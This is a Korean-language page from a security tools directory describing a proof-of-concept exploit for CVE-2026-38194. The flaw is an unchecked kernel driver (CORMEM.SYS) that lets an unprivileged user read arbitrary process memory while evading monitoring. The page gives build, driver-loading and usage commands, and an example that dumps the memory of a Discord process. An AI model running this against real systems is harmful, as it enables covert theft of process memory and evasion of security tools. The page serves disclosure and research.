Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cormem-read-poc — 이 도구는 Teledyne Digital Imaging Sapera Memory Manager(v9.0.0.0 이하)의 취약점인 CVE-2026-38194를 시연합니다. CORMEM.SYS 커널 드라이버는 액세스 제어 검사 없이 IOCTL을 노출하여, 권한이 없는 일반 사용자가 커널을 통해 임의 프로세스 메모리를 직접 읽고 쓸 수 있게 하며, 이는 Win32 API 모니터링을 우회합니다. | Kitploit
도구/GitHubGitHub/4d4j/cormem-read-poc
Privilege EscalationMemory ForensicsVulnerability AnalysisExploitationLearning & EducationBinary Exploitation
GitHub4d4j/cormem-read-poc

cormem-read-poc

이 도구는 Teledyne Digital Imaging Sapera Memory Manager(v9.0.0.0 이하)의 취약점인 CVE-2026-38194를 시연합니다. CORMEM.SYS 커널 드라이버는 액세스 제어 검사 없이 IOCTL을 노출하여, 권한이 없는 일반 사용자가 커널을 통해 임의 프로세스 메모리를 직접 읽고 쓸 수 있게 하며, 이는 Win32 API 모니터링을 우회합니다.

저장소 보기
82개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

면책 조항:

이 프로젝트는 교육 및 보안 연구 목적으로만 제작되었습니다. 소유하고 있거나 명시적 테스트 허가를 받은 시스템에서만 사용하십시오. 무단 사용은 귀하의 관할권에서 불법일 수 있습니다.

cordrv_exploit — CVE-2026-38194

취약점

이 도구는 Teledyne Digital Imaging Sapera Memory Manager(v9.0.0.0 이하)의 취약점인 CVE-2026-38194를 시연합니다.

CORMEM.SYS 커널 드라이버는 액세스 제어 검사 없이 IOCTL을 노출하므로, 표준 권한 없는 사용자가 Win32 API 모니터링을 완전히 우회하여 커널을 통해 직접 임의 프로세스 메모리를 읽고 쓸 수 있습니다.

poc

메모리는 ReadProcessMemory 대신 물리적 주소 변환(페이지 테이블 워크)을 통해 액세스되므로 대부분의 사용자 공간 보안 소프트웨어에 투명하게 작동합니다.

요구 사항

  • Windows 10/11
  • CORMEM.SYS 로드됨
  • Visual Studio 2022/2026 + CMake 3.20+

빌드

root@kitploit:~
cmake -B build -A x64
cmake --build build --config Release

드라이버 로드

CORMEM.SYS가 아직 로드되지 않은 경우, 관리자 권한으로 수동으로 로드하십시오:

root@kitploit:~
sc.exe create CORMEM binPath= "C:\path\to\CORMEM.SYS" type= kernel start= demand
sc.exe start CORMEM

완료 후 언로드:

root@kitploit:~
sc.exe stop CORMEM
sc.exe delete CORMEM

사용법

root@kitploit:~
cordrv_exploit.exe <pid> <address> [size]

  pid      프로세스 ID (10진수)
  address  읽을 가상 주소 (16진수)
  size     덤프할 바이트 수, 기본값 256, 최대 1048576

예제 — Discord PE 헤더 읽기

root@kitploit:~
# Get the main Discord process
$proc = Get-Process -Name "Discord" | Sort-Object WorkingSet -Descending | Select-Object -First 1
$discordPid = $proc.Id
$base = $proc.Modules[0].BaseAddress

Write-Host "PID  : $discordPid"
Write-Host "Base : 0x$($base.ToString('X'))"

.\build\Release\cordrv_exploit.exe $discordPid "0x$($base.ToString('X'))" 256

예상 출력:

root@kitploit:~
[*] Target PID     : 16364
[*] Target address : 0x7FF6FC180000
[*] Dump size      : 256 bytes

[*] Initializing CorDrv...
[+] Driver initialized.

[*] Finding system DTB...
[+] System DTB: 0x1AE000

[*] Searching EPROCESS list for PID 16364...
[+] Process DTB: 0x2CD30F000

[+] VA 0x7FF6FC180000 -> PA 0x1A98C2000

Memory dump (0x7FF6FC180000, 256 bytes):
  7FF6FC180000: 4D 5A 78 00 01 00 00 00 04 00 00 00 00 00 00 00
  7FF6FC180010: 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00
  ...

[+] Done.

오프셋 0의 4D 5A는 MZ 헤더가 물리적 RAM에서 성공적으로 읽혔음을 확인합니다.

참고 사항

  • 디스크로 스왑 아웃된 페이지는 읽을 수 없습니다(TranslateVirtualAddress가 0을 반환함).
  • 일부 프로세스는 여러 인스턴스를 생성하므로 항상 작업 세트가 가장 큰 프로세스를 대상으로 하십시오.
  • Windows 11에서 HVCI/보안 부팅이 활성화되어 있고 해당 드라이버가 Microsoft 차단 목록에 있는 경우 CORMEM.SYS가 차단될 수 있습니다.
도구 다운로드